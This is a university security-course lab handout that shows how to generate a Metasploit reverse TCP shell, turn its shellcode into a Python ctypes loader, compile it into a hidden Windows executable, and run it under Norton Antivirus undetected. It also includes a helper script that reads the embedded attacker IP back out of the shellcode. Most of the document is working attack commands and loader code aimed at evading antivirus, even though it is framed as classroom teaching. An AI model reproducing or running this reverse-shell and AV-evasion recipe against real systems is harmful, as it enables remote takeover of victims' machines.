Proj 10: Defeating Norton Antivirus with Python (20 pts. + 30 extra)

What You Need

Purpose

Make a reverse TCP shell exploit with Metasploit, compile it into a Windows executable, and use it to control a Windows target with Norton Antivirus running.

This is a strong demonstration of the weak protection afforded by antivirus.

Networking

Start both your Windows target and your Kali Linux attacker. Make sure you can ping the Kali Linux box from the Windows box. If you want to attack a Windows 7 host that is running Kali Linux as a virtual machine, use Bridged networking mode.

Generating Malicious Code with Metasploit

In Kali Linux, in a Terminal, execute this command:

ifconfig

Make a note of your Kali Linux box's IP address.

In Kali Linux, in a Terminal, execute these commands, replacing the IP address with the IP address of your Kali Linux box, and "YOURNAME" with your own name (without spaces).

msfpayload windows/shell/reverse_tcp LHOST=192.168.119.132 C > YOURNAME-rsh.py

nano YOURNAME-rsh.py

The file opens in nano, as shown below.

The output is formatted as C source (an unsigned char array), not as Python, so some additional lines are needed to turn it into a Python script.

Add this line to the top of the file:

from ctypes import *

That imports ctypes, the library that lets Python place the raw machine code in memory and call it as a native function.

Remove all the comment lines. TIP: in nano, Ctrl+K deletes a line.

Remove this line:

unsigned char buf[] =

Add this text to the start of the first line of hexadecimal codes:

stage1code = (

Your screen should now look like this:

In nano, use the down-arrow key to find the end of the first block of green hexadecimal codes, as shown below:

Add a closing parenthesis before the semicolon at the end of the first block of green hexadecimal codes, like this:

Add these lines to the end of the first block of green hexadecimal codes:

memory1 = create_string_buffer(stage1code, len(stage1code))

stage1 = cast(memory1, CFUNCTYPE(c_void_p))

stage1()

Your screen should now look like this:

Below the lines you just added, remove all the comment lines.

Remove this line:

unsigned char buf[] =

Add this text to the start of the first line of hexadecimal codes:

stage2code = (

Your screen should now look like this:

In nano, use the down-arrow key to move to the end of the file.

Add a closing parenthesis before the semicolon at the end of the block of green hexadecimal codes, like this:

Add these lines to the end of the second block of green hexadecimal codes:

memory2 = create_string_buffer(stage2code, len(stage2code))

stage2 = cast(memory2, CFUNCTYPE(c_void_p))

stage2()

Your screen should now look like this:

Save the file with Ctrl+X, Y, Enter.

In Kali Linux, in a Terminal, execute this command to copy the file to your Kali desktop:

cp YOURNAME-rsh.py ~/Desktop

Moving the File to your Windows Machine

In Kali Linux, minimize all windows.

Drag the YOURNAME-rsh.py file from the Kali Linux desktop to the desktop of your host system.

If you are not attacking the host, move the file from the desktop of the host system to your target system.

You could also move the file by emailing it.

Starting a Metasploit Listener

Your Kali machine will serve as the Command & Control server for the Windows bot. Therefore it must be listening for bots to call in, requesting commands.

In Kali Linux, in a Terminal, execute these commands:

msfconsole

use exploit/multi/handler

set PAYLOAD windows/shell/reverse_tcp

set LHOST 0.0.0.0

set ExitOnSession false

exploit -j

The payload handler should start, like this:

Preparing your Windows Python Environment

You need Python 2.7, PyWin32, pip-Win, and pyinstaller on your Windows system, as you set it up in the two previous projects.

Starting pip-Win

On your Windows machine, click Start. In the Search box, type in pip-Win.

When it finds pip-Win1.6.exe, click it.

In pip-Win1.6, in the Command field, enter

venv pyi-env-name

as shown below:

Click Run.

A command shell opens with your Python development environment.

Testing the Malware

On Windows, in the Command Prompt window, execute this command:

python YOURNAME-rsh.py

You should see a "session opened" message on Kali.

In Kali, execute this command to start interaction with the Windows target:

sessions -i 1

On Kali, you should see a banner saying "Microsoft Windows", as shown below:

Troubleshooting

Wrong Path

If python cannot find your YOURNAME-rsh.py file, you are in the wrong working directory. Use the CD command to move to the correct directory, which will be something like this:

CD \Users\Administrator\Desktop

Syntax Errors

If you see Python syntax errors on the Windows machine, there are typographical errors in your Python source code.

Open the YOURNAME-rsh.py file on Windows in Wordpad and correct them.

IP Address Errors

If the Python code runs, but no session is opened on Kali Linux, you may have made malware that connects to the wrong address. Open a new Command Prompt window on Windows and try pinging the Kali Linux machine. If the address is wrong, you will have to repeat the whole process to make new exploit code, because the address is encoded in the hexadecimal values and is not simple to fix by hand.
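The LHOST you passed to msfpayload is not lost, though: it sits in the stager as the operand of a push instruction, so it can be read back out of the .py file before you rebuild everything. The triage helper below is an added example, not part of the original project, and runs under Python 3; it assumes the Metasploit reverse_tcp stager sets up its sockaddr_in with "push <ip>" followed by "push <AF_INET | port>" (an assumption about that stager's layout), and the SAMPLE_SOURCE it scans is a constructed fragment with filler bytes, not a working stager.

```python
import re
import struct

# Constructed stand-in for a YOURNAME-rsh.py file. Only the sockaddr_in
# setup of the reverse_tcp stager is reproduced (push <ip>; push
# <AF_INET | port>); the surrounding bytes are filler, so this is not a
# working stager.
SAMPLE_SOURCE = r'''
from ctypes import *
stage1code = (
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x68\xc0\xa8\x77\x84\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"
)
'''

HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')

# Assumption about the stager layout:
#   push <ip, 4 bytes in network order>   -> 68 ip ip ip ip
#   push <AF_INET (2), port big-endian>   -> 68 02 00 pp pp
SOCKADDR_PUSH = re.compile(rb'\x68(.{4})\x68\x02\x00(.{2})', re.DOTALL)


def extract_shellcode_bytes(source):
    """Join every \\xNN escape in the .py source, in order, into raw bytes."""
    return bytes.fromhex("".join(HEX_ESCAPE.findall(source)))


def find_reverse_tcp_endpoints(code):
    """Return [(ip, port), ...] for each sockaddr push pattern in the bytes."""
    found = []
    for m in SOCKADDR_PUSH.finditer(code):
        ip = ".".join(str(b) for b in m.group(1))
        port = struct.unpack(">H", m.group(2))[0]
        found.append((ip, port))
    return found


def check_lhost(source, expected_ip, expected_port=4444):
    """True if the embedded endpoint matches the listener you are running."""
    endpoints = find_reverse_tcp_endpoints(extract_shellcode_bytes(source))
    return (expected_ip, expected_port) in endpoints


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SOURCE
    endpoints = find_reverse_tcp_endpoints(extract_shellcode_bytes(text))
    print("embedded C2 endpoints: %s" % (endpoints or "none found"))
```

Run it against your own YOURNAME-rsh.py on Kali to confirm the address before repeating the build; the default port is 4444 because the msfpayload command above does not set LPORT.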

VMware Networking Problems

VMware machines running Kali tend to ignore SYN packets and/or send inappropriate RST packets. A simple workaround is to run Wireshark and leave it sniffing on the adapter.

Open a new Terminal window in Kali and execute this command:

wireshark

Start sniffing on your network adapter.

Try the exploit again.

Metasploit Listener Problems

If the session dies with an ECONNRESET error message in Metasploit, use the exit command to stop Metasploit and start the listener again. Restarting Wireshark may also help.

Capturing a Screen Image

Make sure both desktops are visible, showing the three items listed below. You may need two images to capture it all.

Save the image as "Proj 10a from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Stopping the Python Exploit

On Windows, close the Command Prompt window running your YOURNAME-rsh.py program.

Starting pip-Win Again

On your Windows machine, in pip-Win1.6, click Run.

A command shell opens with your Python development environment.

Compiling the Malware

On Windows, in the Command Prompt window, execute this command:

pyinstaller --onefile --noconsole YOURNAME-rsh.py

This creates a file named "YOURNAME-rsh.exe" in the "dist" folder on your desktop.

Troubleshooting

If you see an error message saying "Error: PyInstaller for Python 2.6+ on Windows needs pywin32", that means pywin32 did not install correctly.

Reinstall it by executing this command in the black Command Prompt window:

easy_install "C:\Users\Student\Downloads\pywin32-218.win32-py2.7.exe"

You may have to adjust the path to point to the pywin32 file you downloaded.

Running the Malware

On your Windows desktop, double-click the dist folder.

Double-click the YOURNAME-rsh.exe file.

You should see a "session opened" message on Kali.

In Kali, execute this command to start interaction with the Windows target:

sessions -i 2
On Kali, you should see a banner saying "Microsoft Windows", as shown below:

Capturing a Screen Image

Make sure both desktops are visible, showing the two items listed below. You may need two images to capture it all.

Save the image as "Proj 10b from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Stopping the Malware

In Windows, right-click the taskbar at the bottom of the desktop and click "Start Task manager". In Task Manager, find the two processes named YOURNAME-rsh.exe, as shown below.

Right-click one of the two YOURNAME-rsh.exe processes, click "End Process", and click "End Process" again to confirm.

If both "YOURNAME-rsh.exe" processes vanish, you're done. If one is still running, close it the same way.

Adding Norton Antivirus to your Windows Machine

In your Windows machine, open a Browser and go to this URL:

http://goo.gl/BPq4DN

A 30-day trial version of Norton Antivirus downloads.

Install it with the default options.

Update Norton when you are prompted to. Restart your Windows machine if you are prompted to.

When Norton is all updated and running, run its console, so you can see the green "All Threats Resolved" message, as shown below.

Then run the executable again, and establish a remote control session with Kali Linux.

See what Norton does about it. At the time I wrote this, Norton didn't do a thing, as shown below.

Capturing a Screen Image

Make sure both desktops are visible, showing the three items listed below. You may need two images to capture it all.

Save the image as "Proj 10c from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Challenges (up to +30 pts.)

Try other antivirus applications! If you can find a free trial version, try the commercial ones like Kaspersky, Nod32, Trend, etc. Free ones are OK too, like AVG, Avira, Avast, Microsoft Security Essentials, etc.

For each AV, turn in a screen shot showing the EXE file running and Kali Linux showing an open session, with the AV panel showing whether it detected the malware. Of course, if the AV detects it, it will probably delete the EXE file and block the session, so capture an image showing that.

Each other AV product you test is worth +10 points, up to a maximum of +30.

Turning in Your Project

Send the images to cnit.124@gmail.com with a subject of "Proj 10 from YOUR NAME".

Sources

I am grateful for assistance from @info_dox, @NortonSupport, and @ViolentPython in developing this project.

Using meterpreter on local machine without an exploit

Violent Python
Last revised: 4-21-14 9:26 pm